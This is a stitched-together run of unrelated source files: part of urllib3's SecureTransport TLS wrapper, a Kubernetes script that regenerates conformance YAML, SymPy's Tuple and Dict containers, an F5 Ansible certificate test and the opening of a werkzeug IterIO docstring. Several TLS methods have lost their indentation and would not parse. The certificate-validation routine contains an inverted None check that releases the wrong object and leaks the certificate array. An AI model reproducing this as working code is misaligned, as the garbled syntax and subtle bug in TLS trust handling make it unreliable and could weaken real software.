        requested_length = data_length_pointer[0]

        timeout = wrapped_socket.gettimeout()
        error = None
        read_count = 0
        # Zero-copy view over the buffer SecureTransport asked us to fill.
        buffer = (ctypes.c_char * requested_length).from_address(data_buffer)
        buffer_view = memoryview(buffer)

        try:
            while read_count < requested_length:
                if timeout is None or timeout >= 0:
                    readables = util.wait_for_read([base_socket], timeout)
                    if not readables:
                        raise socket.error(errno.EAGAIN, 'timed out')

                # We need to tell ctypes that we have a buffer that can be
                # written to. Upsettingly, we do that like this:
                chunk_size = base_socket.recv_into(
                    buffer_view[read_count:requested_length]
                )
                read_count += chunk_size
                if not chunk_size:
                    # Peer closed: graceful only if nothing was read at all.
                    if not read_count:
                        return SecurityConst.errSSLClosedGraceful
                    break
        except (socket.error) as e:
            error = e.errno

            if error is not None and error != errno.EAGAIN:
                if error == errno.ECONNRESET:
                    return SecurityConst.errSSLClosedAbort
                raise

        data_length_pointer[0] = read_count

        # Short read: ask SecureTransport to call us again later.
        if read_count != requested_length:
            return SecurityConst.errSSLWouldBlock

        return 0
    except Exception as e:
        if wrapped_socket is not None:
            wrapped_socket._exception = e
        return SecurityConst.errSSLInternal
def _write_callback(connection_id, data_buffer, data_length_pointer):
    """
    SecureTransport write callback. This is called by ST to request that data
    actually be sent on the network.

    Mirror of _read_callback: exceptions must not cross the ctypes
    boundary, so they are stashed on the wrapped socket and signalled to
    SecureTransport as status codes.
    """
    wrapped_socket = None
    try:
        wrapped_socket = _connection_refs.get(connection_id)
        if wrapped_socket is None:
            return SecurityConst.errSSLInternal
        base_socket = wrapped_socket.socket

        bytes_to_write = data_length_pointer[0]
        data = ctypes.string_at(data_buffer, bytes_to_write)

        timeout = wrapped_socket.gettimeout()
        error = None
        sent = 0

        try:
            while sent < bytes_to_write:
                if timeout is None or timeout >= 0:
                    writables = util.wait_for_write([base_socket], timeout)
                    if not writables:
                        raise socket.error(errno.EAGAIN, 'timed out')
                chunk_sent = base_socket.send(data)
                sent += chunk_sent

                # This has some needless copying here, but I'm not sure there's
                # much value in optimising this data path.
                data = data[chunk_sent:]
        except (socket.error) as e:
            error = e.errno

            if error is not None and error != errno.EAGAIN:
                if error == errno.ECONNRESET:
                    return SecurityConst.errSSLClosedAbort
                raise

        data_length_pointer[0] = sent

        # Partial write: SecureTransport will retry with the remainder.
        if sent != bytes_to_write:
            return SecurityConst.errSSLWouldBlock

        return 0
    except Exception as e:
        if wrapped_socket is not None:
            wrapped_socket._exception = e
        return SecurityConst.errSSLInternal
# We need to keep these two objects references alive: if they get GC'd while
# in use then SecureTransport could attempt to call a function that is in freed
# memory. That would be...uh...bad. Yeah, that's the word. Bad.
# (ctypes function-pointer wrappers do not keep the Python callable alive
# on their own, hence the module-level bindings.)
_read_callback_pointer = Security.SSLReadFunc(_read_callback)
_write_callback_pointer = Security.SSLWriteFunc(_write_callback)
class WrappedSocket(object):
"""
API-compatibility wrapper for Python's OpenSSL wrapped socket object.
Note: _makefile_refs, _drop(), and _reuse() are needed for the garbage
collector of PyPy.
"""
    def __init__(self, socket):
        """Wrap *socket*; TLS state is created later by handshake()."""
        self.socket = socket
        self.context = None
        self._makefile_refs = 0
        self._closed = False
        # Exceptions raised inside the ctypes I/O callbacks are stashed
        # here and re-raised by _raise_on_error().
        self._exception = None
        self._keychain = None
        self._keychain_dir = None
        self._client_cert_chain = None

        # We save off the previously-configured timeout and then set it to
        # zero. This is done because we use select and friends to handle the
        # timeouts, but if we leave the timeout set on the lower socket then
        # Python will "kindly" call select on that socket again for us. Avoid
        # that by forcing the timeout to zero.
        self._timeout = self.socket.gettimeout()
        self.socket.settimeout(0)
    @contextlib.contextmanager
    def _raise_on_error(self):
        """
        A context manager that can be used to wrap calls that do I/O from
        SecureTransport. If any of the I/O callbacks hit an exception, this
        context manager will correctly propagate the exception after the fact.
        This avoids silently swallowing those exceptions.

        It also correctly forces the socket closed.
        """
        # Clear any stale exception before the wrapped I/O runs.
        self._exception = None

        # We explicitly don't catch around this yield because in the unlikely
        # event that an exception was hit in the block we don't want to swallow
        # it.
        yield
        if self._exception is not None:
            exception, self._exception = self._exception, None
            self.close()
            raise exception
def _set_ciphers(self):
"""
Sets up the allowed ciphers. By default this matches the set in
util.ssl_.DEFAULT_CIPHERS, at least as supported by macOS. This is done
custom and doesn't allow changing at this time, mostly because parsing
OpenSSL cipher strings is going to be a freaking nightmare.
"""
ciphers = (Security.SSLCipherSuite * len(CIPHER_SUITES))(*CIPHER_SUITES)
result = Security.SSLSetEnabledCiphers(
self.context, ciphers, len(CIPHER_SUITES)
)
_assert_no_error(result)
def _custom_validate(self, verify, trust_bundle):
"""
Called when we have set custom validation. We do this in two cases:
first, when cert validation is entirely disabled; and second, when
using a custom trust DB.
"""
# If we disabled cert validation, just say: cool.
if not verify:
return
# We want data in memory, so load it up.
if os.path.isfile(trust_bundle):
with open(trust_bundle, 'rb') as f:
trust_bundle = f.read()
cert_array = None
trust = Security.SecTrustRef()
try:
# Get a CFArray that contains the certs we want.
cert_array = _cert_array_from_pem(trust_bundle)
# Ok, now the hard part. We want to get the SecTrustRef that ST has
# created for this connection, shove our CAs into it, tell ST to
# ignore everything else it knows, and then ask if it can build a
# chain. This is a buuuunch of code.
result = Security.SSLCopyPeerTrust(
self.context, ctypes.byref(trust)
)
_assert_no_error(result)
if not trust:
raise ssl.SSLError("Failed to copy trust reference")
result = Security.SecTrustSetAnchorCertificates(trust, cert_array)
_assert_no_error(result)
result = Security.SecTrustSetAnchorCertificatesOnly(trust, True)
_assert_no_error(result)
trust_result = Security.SecTrustResultType()
result = Security.SecTrustEvaluate(
trust, ctypes.byref(trust_result)
)
_assert_no_error(result)
finally:
if trust:
CoreFoundation.CFRelease(trust)
if cert_array is None:
CoreFoundation.CFRelease(cert_array)
# Ok, now we can look at what the result was.
successes = (
SecurityConst.kSecTrustResultUnspecified,
SecurityConst.kSecTrustResultProceed
)
if trust_result.value not in successes:
raise ssl.SSLError(
"certificate verify failed, error code: %d" %
trust_result.value
)
    def handshake(self,
                  server_hostname,
                  verify,
                  trust_bundle,
                  min_version,
                  max_version,
                  client_cert,
                  client_key,
                  client_key_passphrase):
        """
        Actually performs the TLS handshake. This is run automatically by
        wrapped socket, and shouldn't be needed in user code.

        :param server_hostname: Peer hostname (str or bytes) used for SNI and
            peer-name checking, or None to skip setting it.
        :param verify: Whether the server certificate should be verified.
        :param trust_bundle: Optional custom CA bundle (path or PEM data).
            When given, or when ``verify`` is falsy, server auth is
            intercepted and handled by _custom_validate() instead of ST.
        :param min_version: SecureTransport minimum protocol version constant.
        :param max_version: SecureTransport maximum protocol version constant.
        :param client_cert: Optional client certificate chain path.
        :param client_key: Optional client private key path.
        :param client_key_passphrase: Accepted for interface compatibility;
            note it is not forwarded to _load_client_cert_chain() here.
        """
        # First, we do the initial bits of connection setup. We need to create
        # a context, set its I/O funcs, and set the connection reference.
        self.context = Security.SSLCreateContext(
            None, SecurityConst.kSSLClientSide, SecurityConst.kSSLStreamType
        )
        result = Security.SSLSetIOFuncs(
            self.context, _read_callback_pointer, _write_callback_pointer
        )
        _assert_no_error(result)

        # Here we need to compute the handle to use. We do this by taking the
        # id of self modulo 2**31 - 1. If this is already in the dictionary, we
        # just keep incrementing by one until we find a free space.
        with _connection_ref_lock:
            handle = id(self) % 2147483647
            while handle in _connection_refs:
                handle = (handle + 1) % 2147483647
            _connection_refs[handle] = self

        result = Security.SSLSetConnection(self.context, handle)
        _assert_no_error(result)

        # If we have a server hostname, we should set that too.
        if server_hostname:
            if not isinstance(server_hostname, bytes):
                server_hostname = server_hostname.encode('utf-8')

            result = Security.SSLSetPeerDomainName(
                self.context, server_hostname, len(server_hostname)
            )
            _assert_no_error(result)

        # Setup the ciphers.
        self._set_ciphers()

        # Set the minimum and maximum TLS versions.
        result = Security.SSLSetProtocolVersionMin(self.context, min_version)
        _assert_no_error(result)
        result = Security.SSLSetProtocolVersionMax(self.context, max_version)
        _assert_no_error(result)

        # If there's a trust DB, we need to use it. We do that by telling
        # SecureTransport to break on server auth. We also do that if we don't
        # want to validate the certs at all: we just won't actually do any
        # authing in that case.
        if not verify or trust_bundle is not None:
            result = Security.SSLSetSessionOption(
                self.context,
                SecurityConst.kSSLSessionOptionBreakOnServerAuth,
                True
            )
            _assert_no_error(result)

        # If there's a client cert, we need to use it.
        if client_cert:
            self._keychain, self._keychain_dir = _temporary_keychain()
            self._client_cert_chain = _load_client_cert_chain(
                self._keychain, client_cert, client_key
            )
            result = Security.SSLSetCertificate(
                self.context, self._client_cert_chain
            )
            _assert_no_error(result)

        while True:
            with self._raise_on_error():
                result = Security.SSLHandshake(self.context)

                if result == SecurityConst.errSSLWouldBlock:
                    raise socket.timeout("handshake timed out")
                elif result == SecurityConst.errSSLServerAuthCompleted:
                    # ST paused at server auth (BreakOnServerAuth above):
                    # run our own validation, then resume the handshake.
                    self._custom_validate(verify, trust_bundle)
                    continue
                else:
                    _assert_no_error(result)
                    break
def fileno(self):
return self.socket.fileno()
# Copy-pasted from Python 3.5 source code
def _decref_socketios(self):
if self._makefile_refs > 0:
self._makefile_refs -= 1
if self._closed:
self.close()
def recv(self, bufsiz):
buffer = ctypes.create_string_buffer(bufsiz)
bytes_read = self.recv_into(buffer, bufsiz)
data = buffer[:bytes_read]
return data
    def recv_into(self, buffer, nbytes=None):
        """
        Read up to ``nbytes`` bytes into ``buffer`` and return the number of
        bytes actually read. Returns 0 once the connection is closed; raises
        socket.timeout when the read times out with nothing transferred.
        """
        # Read short on EOF.
        if self._closed:
            return 0

        if nbytes is None:
            nbytes = len(buffer)

        # Re-expose the target buffer as a ctypes char array so SSLRead can
        # fill it in place.
        buffer = (ctypes.c_char * nbytes).from_buffer(buffer)
        processed_bytes = ctypes.c_size_t(0)

        with self._raise_on_error():
            result = Security.SSLRead(
                self.context, buffer, nbytes, ctypes.byref(processed_bytes)
            )

        # There are some result codes that we want to treat as "not always
        # errors". Specifically, those are errSSLWouldBlock,
        # errSSLClosedGraceful, and errSSLClosedNoNotify.
        if (result == SecurityConst.errSSLWouldBlock):
            # If we didn't process any bytes, then this was just a time out.
            # However, we can get errSSLWouldBlock in situations when we *did*
            # read some data, and in those cases we should just read "short"
            # and return.
            if processed_bytes.value == 0:
                # Timed out, no data read.
                raise socket.timeout("recv timed out")
        elif result in (SecurityConst.errSSLClosedGraceful, SecurityConst.errSSLClosedNoNotify):
            # The remote peer has closed this connection. We should do so as
            # well. Note that we don't actually return here because in
            # principle this could actually be fired along with return data.
            # It's unlikely though.
            self.close()
        else:
            _assert_no_error(result)

        # Ok, we read and probably succeeded. We should return whatever data
        # was actually read.
        return processed_bytes.value
    def settimeout(self, timeout):
        """Record the socket timeout (seconds, or None); mirrors socket API."""
        self._timeout = timeout

    def gettimeout(self):
        """Return the timeout previously set with settimeout()."""
        return self._timeout
    def send(self, data):
        """
        Write ``data`` through SecureTransport and return the number of bytes
        actually sent (may be fewer than requested). Raises socket.timeout if
        the write would block before any bytes were transferred.
        """
        processed_bytes = ctypes.c_size_t(0)

        with self._raise_on_error():
            result = Security.SSLWrite(
                self.context, data, len(data), ctypes.byref(processed_bytes)
            )

        if result == SecurityConst.errSSLWouldBlock and processed_bytes.value == 0:
            # Timed out
            raise socket.timeout("send timed out")
        else:
            _assert_no_error(result)

        # We sent, and probably succeeded. Tell them how much we sent.
        return processed_bytes.value
def sendall(self, data):
total_sent = 0
while total_sent < len(data):
sent = self.send(data[total_sent:total_sent + SSL_WRITE_BLOCKSIZE])
total_sent += sent
    def shutdown(self):
        """Send the TLS close_notify to the peer via SSLClose."""
        with self._raise_on_error():
            Security.SSLClose(self.context)
    def close(self):
        """
        Close the connection and release all SecureTransport resources, but
        only when no makefile() references remain; otherwise just drop one
        reference and defer the real teardown.
        """
        # TODO: should I do clean shutdown here? Do I have to?
        if self._makefile_refs < 1:
            self._closed = True
            if self.context:
                CoreFoundation.CFRelease(self.context)
                self.context = None
            if self._client_cert_chain:
                CoreFoundation.CFRelease(self._client_cert_chain)
                self._client_cert_chain = None
            if self._keychain:
                # Delete and release the temporary keychain created for the
                # client certificate, then remove its backing directory.
                Security.SecKeychainDelete(self._keychain)
                CoreFoundation.CFRelease(self._keychain)
                shutil.rmtree(self._keychain_dir)
                self._keychain = self._keychain_dir = None
            return self.socket.close()
        else:
            self._makefile_refs -= 1
    def getpeercert(self, binary_form=False):
        """
        Return the peer's leaf certificate as DER-encoded bytes, or None when
        no handshake has completed yet. Only ``binary_form=True`` is
        supported; see the comment below for why the dict form is not.
        """
        # Urgh, annoying.
        #
        # Here's how we do this:
        #
        # 1. Call SSLCopyPeerTrust to get hold of the trust object for this
        #    connection.
        # 2. Call SecTrustGetCertificateAtIndex for index 0 to get the leaf.
        # 3. To get the CN, call SecCertificateCopyCommonName and process that
        #    string so that it's of the appropriate type.
        # 4. To get the SAN, we need to do something a bit more complex:
        #    a. Call SecCertificateCopyValues to get the data, requesting
        #       kSecOIDSubjectAltName.
        #    b. Mess about with this dictionary to try to get the SANs out.
        #
        # This is gross. Really gross. It's going to be a few hundred LoC extra
        # just to repeat something that SecureTransport can *already do*. So my
        # operating assumption at this time is that what we want to do is
        # instead to just flag to urllib3 that it shouldn't do its own hostname
        # validation when using SecureTransport.
        if not binary_form:
            raise ValueError(
                "SecureTransport only supports dumping binary certs"
            )
        trust = Security.SecTrustRef()
        certdata = None
        der_bytes = None

        try:
            # Grab the trust store.
            result = Security.SSLCopyPeerTrust(
                self.context, ctypes.byref(trust)
            )
            _assert_no_error(result)
            if not trust:
                # Probably we haven't done the handshake yet. No biggie.
                return None

            cert_count = Security.SecTrustGetCertificateCount(trust)
            if not cert_count:
                # Also a case that might happen if we haven't handshaked.
                # Handshook? Handshaken?
                return None

            leaf = Security.SecTrustGetCertificateAtIndex(trust, 0)
            assert leaf

            # Ok, now we want the DER bytes.
            certdata = Security.SecCertificateCopyData(leaf)
            assert certdata

            data_length = CoreFoundation.CFDataGetLength(certdata)
            data_buffer = CoreFoundation.CFDataGetBytePtr(certdata)
            der_bytes = ctypes.string_at(data_buffer, data_length)
        finally:
            # Balance the Copy* calls above regardless of outcome.
            if certdata:
                CoreFoundation.CFRelease(certdata)
            if trust:
                CoreFoundation.CFRelease(trust)

        return der_bytes
    def _reuse(self):
        """Take an extra reference; pairs with _drop() and gates close()."""
        self._makefile_refs += 1
def _drop(self):
if self._makefile_refs < 1:
self.close()
else:
self._makefile_refs -= 1
# Choose a makefile() implementation at import time and attach it to
# WrappedSocket: Python 2 can reuse the internal socket._fileobject helper,
# while Python 3 goes through the backport_makefile shim.
if _fileobject: # Platform-specific: Python 2
    def makefile(self, mode, bufsize=-1):
        # Count the extra reference so close() can defer real teardown.
        self._makefile_refs += 1
        return _fileobject(self, mode, bufsize, close=True)
else: # Platform-specific: Python 3
    def makefile(self, mode="r", buffering=None, *args, **kwargs):
        # We disable buffering with SecureTransport because it conflicts with
        # the buffering that ST does internally (see issue #1153 for more).
        buffering = 0
        return backport_makefile(self, mode, buffering, *args, **kwargs)

WrappedSocket.makefile = makefile
class SecureTransportContext(object):
    """
    I am a wrapper class for the SecureTransport library, to translate the
    interface of the standard library ``SSLContext`` object to calls into
    SecureTransport.
    """
    def __init__(self, protocol):
        # Map the ssl-module protocol constant onto SecureTransport's
        # (min, max) protocol version pair.
        self._min_version, self._max_version = _protocol_to_min_max[protocol]
        self._options = 0
        self._verify = False
        self._trust_bundle = None
        self._client_cert = None
        self._client_key = None
        self._client_key_passphrase = None

    @property
    def check_hostname(self):
        """
        SecureTransport cannot have its hostname checking disabled. For more,
        see the comment on getpeercert() in this file.
        """
        return True

    @check_hostname.setter
    def check_hostname(self, value):
        """
        SecureTransport cannot have its hostname checking disabled. For more,
        see the comment on getpeercert() in this file.
        """
        pass

    @property
    def options(self):
        # TODO: Well, crap.
        #
        # So this is the bit of the code that is the most likely to cause us
        # trouble. Essentially we need to enumerate all of the SSL options that
        # users might want to use and try to see if we can sensibly translate
        # them, or whether we should just ignore them.
        return self._options

    @options.setter
    def options(self, value):
        # TODO: Update in line with above.
        self._options = value

    @property
    def verify_mode(self):
        """Report ssl.CERT_REQUIRED or ssl.CERT_NONE from the verify flag."""
        return ssl.CERT_REQUIRED if self._verify else ssl.CERT_NONE

    @verify_mode.setter
    def verify_mode(self, value):
        self._verify = True if value == ssl.CERT_REQUIRED else False

    def set_default_verify_paths(self):
        # So, this has to do something a bit weird. Specifically, what it does
        # is nothing.
        #
        # This means that, if we had previously had load_verify_locations
        # called, this does not undo that. We need to do that because it turns
        # out that the rest of the urllib3 code will attempt to load the
        # default verify paths if it hasn't been told about any paths, even if
        # the context itself was sometime earlier. We resolve that by just
        # ignoring it.
        pass

    def load_default_certs(self):
        return self.set_default_verify_paths()

    def set_ciphers(self, ciphers):
        """Reject any cipher string other than urllib3's default."""
        # For now, we just require the default cipher string.
        if ciphers != util.ssl_.DEFAULT_CIPHERS:
            raise ValueError(
                "SecureTransport doesn't support custom cipher strings"
            )

    def load_verify_locations(self, cafile=None, capath=None, cadata=None):
        """Remember CA material for custom validation at handshake time."""
        # OK, we only really support cadata and cafile.
        if capath is not None:
            raise ValueError(
                "SecureTransport does not support cert directories"
            )
        self._trust_bundle = cafile or cadata

    def load_cert_chain(self, certfile, keyfile=None, password=None):
        """
        Store client certificate material for use by wrap_socket().

        BUG FIX: the passphrase used to be written to a
        ``_client_cert_passphrase`` attribute that nothing in this module
        reads, silently dropping it. wrap_socket() consumes
        ``_client_key_passphrase`` (initialised in __init__), so store the
        password there.
        """
        self._client_cert = certfile
        self._client_key = keyfile
        self._client_key_passphrase = password

    def wrap_socket(self, sock, server_side=False,
                    do_handshake_on_connect=True, suppress_ragged_eofs=True,
                    server_hostname=None):
        """Wrap *sock* in a WrappedSocket and perform the TLS handshake."""
        # So, what do we do here? Firstly, we assert some properties. This is a
        # stripped down shim, so there is some functionality we don't support.
        # See PEP 543 for the real deal.
        assert not server_side
        assert do_handshake_on_connect
        assert suppress_ragged_eofs

        # Ok, we're good to go. Now we want to create the wrapped socket object
        # and store it in the appropriate place.
        wrapped_socket = WrappedSocket(sock)

        # Now we can handshake
        wrapped_socket.handshake(
            server_hostname, self._verify, self._trust_bundle,
            self._min_version, self._max_version, self._client_cert,
            self._client_key, self._client_key_passphrase
        )
        return wrapped_socket
#!/usr/bin/env bash
# Copyright 2021 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Fail fast: abort on command errors, unset variables, and pipeline failures.
set -euo pipefail

KUBE_ROOT="$(dirname "${BASH_SOURCE[0]}")/.."
cd "${KUBE_ROOT}"

# Regenerate the conformance YAML from the JSON spec...
test/conformance/gen-conformance-yaml.sh

# ...then overwrite the checked-in copy with the freshly generated output.
cp _output/conformance.yaml test/conformance/testdata/conformance.yaml
"""Module for SymPy containers
(SymPy objects that store other SymPy objects)
The containers implemented in this module are subclasses of Basic.
They are supposed to work seamlessly within the SymPy framework.
"""
from __future__ import print_function, division
from sympy.core.basic import Basic
from sympy.core.sympify import sympify, converter
from sympy.utilities.iterables import iterable
class Tuple(Basic):
    """
    Immutable wrapper exposing a builtin ``tuple`` to SymPy.

    Being a :class:`Basic` subclass, a Tuple participates fully in the SymPy
    framework. The wrapped elements live in ``self.args``, and both indexing
    and slicing are supported.

    >>> from sympy import symbols
    >>> from sympy.core.containers import Tuple
    >>> a, b, c, d = symbols('a b c d')
    >>> Tuple(a, b, c)[1:]
    (b, c)
    >>> Tuple(a, b, c).subs(a, d)
    (d, b, c)

    """
    def __new__(cls, *args, **assumptions):
        # Sympify every element before handing off to Basic.
        sympified = [sympify(value) for value in args]
        return Basic.__new__(cls, *sympified, **assumptions)

    def __getitem__(self, i):
        if not isinstance(i, slice):
            return self.args[i]
        start, stop, step = i.indices(len(self))
        return Tuple(*[self.args[j] for j in range(start, stop, step)])

    def __len__(self):
        return len(self.args)

    def __contains__(self, item):
        return item in self.args

    def __iter__(self):
        return iter(self.args)

    def __add__(self, other):
        if isinstance(other, Tuple):
            other = other.args
        elif not isinstance(other, tuple):
            return NotImplemented
        return Tuple(*(self.args + other))

    def __radd__(self, other):
        if isinstance(other, Tuple):
            other = other.args
        elif not isinstance(other, tuple):
            return NotImplemented
        return Tuple(*(other + self.args))

    def __eq__(self, other):
        # Defer to Basic for Basic operands; compare raw args otherwise.
        if isinstance(other, Basic):
            return super(Tuple, self).__eq__(other)
        return self.args == other

    def __ne__(self, other):
        if isinstance(other, Basic):
            return super(Tuple, self).__ne__(other)
        return self.args != other

    def __hash__(self):
        return hash(self.args)

    def _to_mpmath(self, prec):
        return tuple(arg._to_mpmath(prec) for arg in self.args)

    def __lt__(self, other):
        return self.args < other.args

    def __le__(self, other):
        return self.args <= other.args

    # XXX: Basic already defines count() with different semantics, so the
    # tuple-style count has to live under another name (originally renaming
    # it broke a cse() test).
    def tuple_count(self, value):
        """T.count(value) -> integer -- return number of occurrences of value"""
        return self.args.count(value)

    def index(self, value, start=None, stop=None):
        """T.index(value, [start, [stop]]) -> integer -- return first index of value.
           Raises ValueError if the value is not present."""
        # tuple.index() rejects an explicit None for the bounds (see
        # http://bugs.python.org/issue13340), so forward only the bounds
        # that were actually supplied.
        if start is None and stop is None:
            return self.args.index(value)
        if stop is None:
            return self.args.index(value, start)
        return self.args.index(value, start, stop)
# Register Tuple as the sympify() converter for builtin tuples, so tuples
# passed into SymPy APIs are transparently upgraded to Tuple instances.
converter[tuple] = lambda tup: Tuple(*tup)
def tuple_wrapper(method):
    """
    Decorator converting every builtin ``tuple`` positional argument into a
    :class:`Tuple` before the wrapped callable runs.

    This keeps user-facing APIs simple: callers pass ordinary tuples and the
    wrapper upgrades them transparently. Keyword arguments are left alone.

    >>> from sympy.core.containers import tuple_wrapper
    >>> def f(*args):
    ...    return args
    >>> g = tuple_wrapper(f)

    The decorated function g sees only the Tuple argument:

    >>> g(0, (1, 2), 3)
    (0, (1, 2), 3)

    """
    def wrap_tuples(*args, **kw_args):
        # Exact-type check on purpose: only plain tuples are converted.
        converted = [
            Tuple(*arg) if type(arg) is tuple else arg
            for arg in args
        ]
        return method(*converted, **kw_args)
    return wrap_tuples
class Dict(Basic):
    """
    Wrapper around the builtin dict object

    The Dict is a subclass of Basic, so that it works well in the
    SymPy framework. Because it is immutable, it may be included
    in sets, but its values must all be given at instantiation and
    cannot be changed afterwards. Otherwise it behaves identically
    to the Python dict.

    >>> from sympy.core.containers import Dict

    >>> D = Dict({1: 'one', 2: 'two'})
    >>> for key in D:
    ...    if key == 1:
    ...        print('%s %s' % (key, D[key]))
    1 one

    The args are sympified so the 1 and 2 are Integers and the values
    are Symbols. Queries automatically sympify args so the following work:

    >>> 1 in D
    True
    >>> D.has('one') # searches keys and values
    True
    >>> 'one' in D # not in the keys
    False
    >>> D[1]
    one

    """

    def __new__(cls, *args):
        # Accept either a single dict/Dict, or a sequence of (key, value)
        # pairs; either way, normalize to a list of Tuple(k, v) items.
        if len(args) == 1 and ((args[0].__class__ is dict) or
                               (args[0].__class__ is Dict)):
            items = [Tuple(k, v) for k, v in args[0].items()]
        elif iterable(args) and all(len(arg) == 2 for arg in args):
            items = [Tuple(k, v) for k, v in args]
        else:
            raise TypeError('Pass Dict args as Dict((k1, v1), ...) or Dict({k1: v1, ...})')
        # A frozenset makes the container hashable/immutable for Basic.
        elements = frozenset(items)
        obj = Basic.__new__(cls, elements)
        obj.elements = elements
        obj._dict = dict(items) # In case Tuple decides it wants to sympify
        return obj

    def __getitem__(self, key):
        """x.__getitem__(y) <==> x[y]"""
        # Keys are sympified on lookup so plain Python values work.
        return self._dict[sympify(key)]

    def __setitem__(self, key, value):
        raise NotImplementedError("SymPy Dicts are Immutable")

    @property
    def args(self):
        return tuple(self.elements)

    def items(self):
        '''D.items() -> list of D's (key, value) pairs, as 2-tuples'''
        return self._dict.items()

    def keys(self):
        '''D.keys() -> list of D's keys'''
        return self._dict.keys()

    def values(self):
        '''D.values() -> list of D's values'''
        return self._dict.values()

    def __iter__(self):
        '''x.__iter__() <==> iter(x)'''
        return iter(self._dict)

    def __len__(self):
        '''x.__len__() <==> len(x)'''
        return self._dict.__len__()

    def get(self, key, default=None):
        '''D.get(k[,d]) -> D[k] if k in D, else d.  d defaults to None.'''
        return self._dict.get(sympify(key), default)

    def __contains__(self, key):
        '''D.__contains__(k) -> True if D has a key k, else False'''
        return sympify(key) in self._dict

    def __lt__(self, other):
        return self.args < other.args

    @property
    def _sorted_args(self):
        # args come from a frozenset, so sort for a deterministic order.
        from sympy.utilities import default_sort_key
        return sorted(self.args, key=default_sort_key)
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
if sys.version_info < (2, 7):
pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7")
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigip_ssl_certificate import ArgumentSpec
from library.modules.bigip_ssl_certificate import ApiParameters
from library.modules.bigip_ssl_certificate import ModuleParameters
from library.modules.bigip_ssl_certificate import ModuleManager
# In Ansible 2.8, Ansible changed import paths.
from test.units.compat import unittest
from test.units.compat.mock import Mock
from test.units.compat.mock import patch
from test.units.modules.utils import set_module_args
except ImportError:
from ansible.modules.network.f5.bigip_ssl_certificate import ArgumentSpec
from ansible.modules.network.f5.bigip_ssl_certificate import ApiParameters
from ansible.modules.network.f5.bigip_ssl_certificate import ModuleParameters
from ansible.modules.network.f5.bigip_ssl_certificate import ModuleManager
# Ansible 2.8 imports
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from units.modules.utils import set_module_args
# Directory holding the JSON/PEM fixture files used by these tests, plus a
# module-level cache so each fixture is read from disk at most once.
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
    """Return fixture *name*, parsed as JSON when possible, with caching."""
    path = os.path.join(fixture_path, name)
    if path not in fixture_data:
        with open(path) as f:
            raw = f.read()
        try:
            parsed = json.loads(raw)
        except Exception:
            # Not JSON (e.g. a PEM certificate) -- keep the raw text.
            parsed = raw
        fixture_data[path] = parsed
    return fixture_data[path]
class TestParameters(unittest.TestCase):
    """Unit tests for the module/API parameter adapter classes."""

    def test_module_parameters_cert(self):
        # ModuleParameters should derive the filename, checksum and content
        # details from a raw certificate passed as module arguments.
        cert_content = load_fixture('create_insecure_cert1.crt')
        args = dict(
            content=cert_content,
            name="cert1",
            partition="Common",
            state="present",
        )
        p = ModuleParameters(params=args)
        assert p.name == 'cert1'
        assert p.filename == 'cert1.crt'
        assert 'Signature Algorithm' in p.content
        assert '-----BEGIN CERTIFICATE-----' in p.content
        assert '-----END CERTIFICATE-----' in p.content
        assert p.checksum == '1e55aa57ee166a380e756b5aa4a835c5849490fe'
        assert p.state == 'present'

    def test_module_issuer_cert_key(self):
        # A bare issuer cert name should be expanded to a full path with the
        # partition prefix and a .crt suffix.
        args = dict(
            issuer_cert='foo',
            partition="Common",
        )
        p = ModuleParameters(params=args)
        assert p.issuer_cert == '/Common/foo.crt'

    def test_api_issuer_cert_key(self):
        # ApiParameters reads the issuer cert straight from an API payload.
        args = load_fixture('load_sys_file_ssl_cert_with_issuer_cert.json')
        p = ApiParameters(params=args)
        assert p.issuer_cert == '/Common/intermediate.crt'
class TestCertificateManager(unittest.TestCase):
    """Functional tests driving ModuleManager's certificate import flow."""

    def setUp(self):
        self.spec = ArgumentSpec()

    def test_import_certificate_and_key_no_key_passphrase(self, *args):
        # Importing a new certificate (exists() reports False, then True
        # after creation) should report a change.
        set_module_args(dict(
            name='foo',
            content=load_fixture('cert1.crt'),
            state='present',
            password='password',
            server='localhost',
            user='admin'
        ))

        module = AnsibleModule(
            argument_spec=self.spec.argument_spec,
            supports_check_mode=self.spec.supports_check_mode
        )

        # Override methods in the specific type of manager
        mm = ModuleManager(module=module)
        mm.exists = Mock(side_effect=[False, True])
        mm.create_on_device = Mock(return_value=True)

        results = mm.exec_module()

        assert results['changed'] is True

    def test_import_certificate_chain(self, *args):
        # Same import flow, but using a certificate chain fixture.
        set_module_args(dict(
            name='foo',
            content=load_fixture('chain1.crt'),
            state='present',
            password='password',
            server='localhost',
            user='admin'
        ))

        module = AnsibleModule(
            argument_spec=self.spec.argument_spec,
            supports_check_mode=self.spec.supports_check_mode
        )

        # Override methods in the specific type of manager
        mm = ModuleManager(module=module)
        mm.exists = Mock(side_effect=[False, True])
        mm.create_on_device = Mock(return_value=True)

        results = mm.exec_module()

        assert results['changed'] is True
# -*- coding: utf-8 -*-
r"""
werkzeug.contrib.iterio
~~~~~~~~~~~~~~~~~~~~~~~
This module implements a :class:`IterIO` that converts an iterator into
a stream object and the other way round. Converting streams into
iterators requires the `greenlet`_ module.
To convert an iterator into a stream all you have to do is to pass it
directly to the :class:`IterIO` constructor. In this example we pass it
a newly created generator::
def foo():
yield "something\n"
yield "otherthings"
stream = IterIO(foo())
print stream.read() # read the whole iterator
The other way round works a bit differently because we have to ensure that
the code execution doesn't take place yet. An :class:`IterIO` call with a
callable as first argument does two things. The function itself is passed
an :class:`IterIO` stream it can feed. The object returned by the
:class:`IterIO` constructor on the other hand is not an stream object but
an iterator::
def foo(stream):
stream.write("some")
stream.write("thing")
stream.flush()
stream.write("otherthing")
